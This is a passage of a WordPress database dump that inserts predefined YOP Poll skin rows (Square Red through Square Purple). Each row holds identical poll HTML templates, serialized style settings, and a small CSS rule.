(28, 'basic-pretty', 'Square Red', 'square-red', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="red">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:3:"red";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00');
INSERT INTO `wpou_yoppoll_skins` VALUES
(29, 'basic-pretty', 'Square Green', 'square-green', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="green">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:5:"green";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(30, 'basic-pretty', 'Square Blue', 'square-blue', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="blue">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:4:"blue";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(31, 'basic-pretty', 'Square Aero', 'square-aero', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="aero">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:4:"aero";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(32, 'basic-pretty', 'Square Grey', 'square-grey', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="grey">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:4:"grey";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(33, 'basic-pretty', 'Square Orange', 'square-orange', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="orange">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:6:"orange";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(34, 'basic-pretty', 'Square Yellow', 'square-yellow', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="yellow">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:6:"yellow";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(35, 'basic-pretty', 'Square Pink', 'square-pink', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="pink">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 'a:7:{s:4:"poll";a:6:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:7:"#000000";s:12:"borderRadius";s:3:"5px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:4:"10px";}s:9:"questions";a:4:{s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"16px";s:10:"textWeight";s:6:"normal";s:9:"textAlign";s:6:"center";}s:7:"answers";a:7:{s:16:"paddingLeftRight";s:3:"0px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";s:4:"skin";s:6:"square";s:11:"colorScheme";s:4:"pink";}s:7:"buttons";a:9:{s:15:"backgroundColor";s:7:"#ffffff";s:10:"borderSize";s:3:"1px";s:11:"borderColor";s:4:"#000";s:12:"borderRadius";s:3:"0px";s:16:"paddingLeftRight";s:4:"10px";s:16:"paddingTopBottom";s:3:"5px";s:9:"textColor";s:4:"#000";s:8:"textSize";s:4:"14px";s:10:"textWeight";s:6:"normal";}s:7:"captcha";a:0:{}s:6:"errors";a:7:{s:25:"borderLeftColorForSuccess";s:7:"#008000";s:23:"borderLeftColorForError";s:7:"#ff0000";s:14:"borderLeftSize";s:4:"10px";s:16:"paddingTopBottom";s:3:"0px";s:9:"textColor";s:7:"#000000";s:8:"textSize";s:2:"14";s:10:"textWeight";s:6:"normal";}s:6:"custom";a:1:{s:3:"css";s:88:".basic-yop-poll-container[data-uid] .basic-vote {\n									text-align: center;\n								}";}}', '2023-06-21 09:29:39', '0000-00-00 00:00:00'),
(36, 'basic-pretty', 'Square Purple', 'square-purple', '', '<div class="basic-yop-poll-container white-v2" style="padding-top: 14px; padding-bottom: 14px;" data-temp="basic-pretty" data-skin="square" data-cscheme="purple">\n								<div class="row">\n									<div class="col-md-12">\n										<div class="basic-inner">\n											<form class="basic-form">\n												<div class="basic-elements">\n													<div class="basic-element basic-question basic-question-text-vertical">\n														<div class="basic-question-title">\n															<h5>Poll Question</h5>\n														</div><!-- end basic-question-title -->\n														<ul class="basic-answers">\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio" checked>    \n																	<label class="basic-text">Answer 1</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 2</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 3</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 4</label>\n																</div>\n															</li>\n															<li class="basic-answer">\n																<div class="basic-answer-content basic-text-vertical">\n																	<input type="radio">    \n																	<label class="basic-text">Answer 5</label>\n																</div>\n															</li>\n														</ul><!-- end basic-answers -->\n													</div><!-- end basic-element basic-question -->\n													<div class="clearfix"></div>\n												</div><!-- end basic-elements -->\n												<div class="basic-vote">\n													<a href="#" class="button basic-vote-button">Vote</a>\n												</div><!-- end basic-vote -->\n											</form><!-- end basic-form" -->\n										</div><!-- end basic-inner -->\n									</div><!-- end col-md-12 -->\n								</div><!-- end row -->\n							</div><!-- end basic-yop-poll-container -->', 'predefined', 0, 